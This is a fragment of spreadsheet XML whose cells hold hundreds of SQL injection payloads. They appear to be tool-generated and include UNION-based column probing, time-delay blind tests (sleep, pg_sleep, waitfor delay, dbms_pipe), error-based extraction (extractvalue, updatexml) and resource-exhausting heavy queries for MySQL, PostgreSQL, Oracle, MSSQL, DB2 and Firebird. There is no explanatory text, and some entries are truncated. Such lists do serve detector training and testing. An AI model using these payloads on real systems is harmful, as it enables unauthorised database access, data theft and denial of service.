    <t>select count ( * )  from generate_series ( 1,5000000 )  and '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as hpxw where 1826 = 1826 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'mnbg' like 'mnbg</t>
  </si>
  <si>
    <t>1' )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( "diiv" = "diiv</t>
  </si>
  <si>
    <t>1' or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as xutu where 5811 = 5811 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 4306 = 2815 )  then 4306 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'kiex' = 'kiex</t>
  </si>
  <si>
    <t>1' )  where 8163 = 8163</t>
  </si>
  <si>
    <t>1 )  where 9344 = 9344</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   as nlgn where 3834 = 3834 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-1549' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1" where 1852 = 1852 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and 'owwf' = 'owwf</t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'diyb' like 'diyb</t>
  </si>
  <si>
    <t>-6015%' )  order by 1--</t>
  </si>
  <si>
    <t>-2953" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>-9451"  )  )   )  union all select 4211,4211,4211,4211,4211,4211,4211--</t>
  </si>
  <si>
    <t>1' )  where 1470 = 1470 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) </t>
  </si>
  <si>
    <t>-7874  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char</t>
  </si>
  <si>
    <t>1  )  )   order by 1--</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>-1894' )  union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#</t>
  </si>
  <si>
    <t xml:space="preserve"> end</t>
  </si>
  <si>
    <t>-6377' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 5792 = 5792 )  then 5792 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>-1079" )  where 2865 = 2865 union all select 2865,2865,2865,2865,2865,2865,2865,2865,2865#</t>
  </si>
  <si>
    <t>1' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 'mevd' = 'mevd</t>
  </si>
  <si>
    <t>1" or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "kins" = "kins</t>
  </si>
  <si>
    <t>1' where 2145 = 2145</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'uvlu' = 'uvlu</t>
  </si>
  <si>
    <t>1'|| ( select 'dezl' where 8661 = 8661</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5' and  ( 'peyv' like 'peyv</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'qgrt' = 'qgrt</t>
  </si>
  <si>
    <t>select  ( case when  ( 9746 = 8055 )  then 9746 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   as dfwi where 9703 = 9703 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  -- icxn</t>
  </si>
  <si>
    <t>-7485%'  )  )   )  union all select 1303,1303,1303,1303,1303,1303,1303,1303,1303--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-3638" union all select 4394,4394,4394,4394,4394,4394,4394--</t>
  </si>
  <si>
    <t>1 where 7516 = 7516 union all select null#</t>
  </si>
  <si>
    <t>1 )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 where 7442 = 7442</t>
  </si>
  <si>
    <t>-2316'  )  )   )  or 8519 = 6010</t>
  </si>
  <si>
    <t>1  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 9802 = 9802</t>
  </si>
  <si>
    <t>1  )  )   as qsos where 2721 = 2721 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1' )  as tygi where 9891 = 9891 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select case when 9848 = 2618 then 1 else null end--</t>
  </si>
  <si>
    <t>1%" )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) #</t>
  </si>
  <si>
    <t>-5131'  )  )   )  union all select 4854,4854,4854,4854,4854,4854,4854#</t>
  </si>
  <si>
    <t>select case when 5308 = 6745 then 1 else null end--</t>
  </si>
  <si>
    <t>-7689' union all select 8739,8739,8739,8739,8739,8739,8739,8739,8739,8739--</t>
  </si>
  <si>
    <t>1" )  where 6821 = 6821 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'# ogzq</t>
  </si>
  <si>
    <t>-9265" )  or 7834 = 1685</t>
  </si>
  <si>
    <t>1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  # hkrp</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 5335 = 5335</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'aovy' = 'aovy</t>
  </si>
  <si>
    <t>1  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  9313 = 9313</t>
  </si>
  <si>
    <t>1 )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  as uaoz where 2464 = 2464</t>
  </si>
  <si>
    <t>-2823'  )  )   or 5663 = 4228 and   (  (  'skgh' like 'skgh</t>
  </si>
  <si>
    <t>1"  )  )   as eqeb where 6784 = 6784 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1" )  as ktnq where 9005 = 9005</t>
  </si>
  <si>
    <t>1'+ ( select 'lcru' where 3215 = 3215</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( 8853 = 9924 ) *9924 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   as mjps where 2179 = 2179 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-1470'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  where 5307 = 5307</t>
  </si>
  <si>
    <t>1'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'swfj' like 'swfj</t>
  </si>
  <si>
    <t>1 )  where 2473 = 2473 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4932 = 4932 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  </t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 3044 = 3044</t>
  </si>
  <si>
    <t>1%" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select mrdi where 7451 = 7451 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" where 1100 = 1100</t>
  </si>
  <si>
    <t>1  )  )   as rcbz where 4563 = 4563 and 2006 = 2006</t>
  </si>
  <si>
    <t>1  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  as amgf where 4308 = 4308 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'yaml' = 'yaml</t>
  </si>
  <si>
    <t>1" )  where 9621 = 9621</t>
  </si>
  <si>
    <t>-6809"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "nfnf" = "nfnf</t>
  </si>
  <si>
    <t>-5041'  )  )   )  union all select 4820,4820,4820,4820,4820,4820--</t>
  </si>
  <si>
    <t>1 where 8578 = 8578 and 4770 = 4474--</t>
  </si>
  <si>
    <t>1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'raru' = 'raru</t>
  </si>
  <si>
    <t>-7171%'  )  )   union all select 5580,5580,5580,5580,5580,5580,5580,5580--</t>
  </si>
  <si>
    <t>1  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-8772%" )  union all select 5433,5433,5433,5433,5433,5433,5433,5433,5433,5433--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>if ( 6842 = 5446 )  select 6842 else drop function vjfq--</t>
  </si>
  <si>
    <t>1" )  where 3445 = 3445 and elt ( 1212 = 1254,1254 ) --</t>
  </si>
  <si>
    <t>-9237' )  union all select 7454,7454,7454,7454,7454,7454,7454,7454,7454--</t>
  </si>
  <si>
    <t>1'  )  )   as bwjl where 8538 = 8538 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>-7295" )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-1816%'  )  )   )  union all select 2072--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "jyad" = "jyad</t>
  </si>
  <si>
    <t>1  )  )   as epfz where 5471 = 5471</t>
  </si>
  <si>
    <t>1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "regi" like "regi</t>
  </si>
  <si>
    <t>1'|| ( select 'tmsj' where 2971 = 2971 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'jryo' = 'jryo</t>
  </si>
  <si>
    <t>-9014' order by 1--</t>
  </si>
  <si>
    <t>1" )  or sleep ( 5 )  and  ( "xgtk" = "xgtk</t>
  </si>
  <si>
    <t>1 )  where 5385 = 5385 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3748' where 9292 = 9292 or 3337 = 2859#</t>
  </si>
  <si>
    <t>-1587' )  or 8339 = 5540</t>
  </si>
  <si>
    <t>1%"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' )  and 2577 = 7094</t>
  </si>
  <si>
    <t>1 )  where 7684 = 7684 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'zaru' = 'zaru</t>
  </si>
  <si>
    <t>1%' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   and 7989 = 3457</t>
  </si>
  <si>
    <t>1  )  )   as foul where 4361 = 4361 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1%" union all select null--</t>
  </si>
  <si>
    <t>1'+ ( select bruk where 1400 = 1400 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">1,updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 2917 = 2917,1  )  )   ) ,0x717a767a71 ) ,8295 ) </t>
  </si>
  <si>
    <t>1'  )  )   as bewk where 3672 = 3672 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'qfls' = 'qfls</t>
  </si>
  <si>
    <t>1 where 6412 = 6412 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "abcw" = "abcw</t>
  </si>
  <si>
    <t>-4318" )  as vpvt where 5543 = 5543 union all select 5543,5543,5543,5543,5543,5543--</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null#</t>
  </si>
  <si>
    <t>1" where 1982 = 1982</t>
  </si>
  <si>
    <t>1' where 4185 = 4185 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1" )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "kssm" = "kssm</t>
  </si>
  <si>
    <t>1  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and 'nbxw' = 'nbxw</t>
  </si>
  <si>
    <t>1" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "wfwg" like "wfwg</t>
  </si>
  <si>
    <t>1" )  as awdg where 9512 = 9512</t>
  </si>
  <si>
    <t>-9535" order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'kyos' like 'kyos</t>
  </si>
  <si>
    <t>1 )  as asmt where 4986 = 4986 union all select null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 3435 = 4011 )  then 1 else 3435* ( select 3435 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' where 4945 = 4945</t>
  </si>
  <si>
    <t>1" )  where 2496 = 2496</t>
  </si>
  <si>
    <t>1" where 9901 = 9901 and  ( 2455 = 8499 ) *8499--</t>
  </si>
  <si>
    <t>1 where 4519 = 4519</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "lynw" like "lynw</t>
  </si>
  <si>
    <t>1 and sleep ( 5 ) # qcyj</t>
  </si>
  <si>
    <t>1'|| ( select 'wszt' from dual where 6854 = 6854 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>select  ( case when  ( 5423 = 7706 )  then 5423 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' )  as bzem where 4240 = 4240</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "lmjg" like "lmjg</t>
  </si>
  <si>
    <t>1' where 5230 = 5230</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 1183 = 1183</t>
  </si>
  <si>
    <t>-9966'  )  )   union all select 7230,7230,7230,7230,7230,7230,7230#</t>
  </si>
  <si>
    <t>1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'akki' = 'akki</t>
  </si>
  <si>
    <t>1%' )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-2821"  )  )   )  union all select 3920,3920,3920,3920,3920,3920,3920#</t>
  </si>
  <si>
    <t>1%"  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1  )  )   )  and elt ( 3132 = 1541,1541 )  and   (  (   ( 4258 = 4258</t>
  </si>
  <si>
    <t>-2178'  )  )   )  or elt ( 3421 = 2899,2899 )  and   (  (   ( 'jdst' = 'jdst</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and 'beuk' = 'beuk</t>
  </si>
  <si>
    <t>-6595" order by 1--</t>
  </si>
  <si>
    <t>1" )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  where 6950 = 6950 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'lmoh' like 'lmoh</t>
  </si>
  <si>
    <t>-5161%" or  ( 1437 = 4869 ) *4869 and "%" = "</t>
  </si>
  <si>
    <t>-9841 where 4612 = 4612 union all select 4612--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 6750 = 6750 )  then 1 else 6750* ( select 6750 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1' )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1,row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x ) </t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'dhoo' like 'dhoo</t>
  </si>
  <si>
    <t xml:space="preserve">1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1' where 2123 = 2123 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "cadh" like "cadh</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  "dros" = "dros</t>
  </si>
  <si>
    <t>1 )  where 3936 = 3936</t>
  </si>
  <si>
    <t>1%' or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as bebl where 2597 = 2597  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'qyyg' = 'qyyg</t>
  </si>
  <si>
    <t>-4176'+ ( select 'muio' where 4256 = 4256 union all select 4256,4256,4256,4256,4256,4256#</t>
  </si>
  <si>
    <t>-3424'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
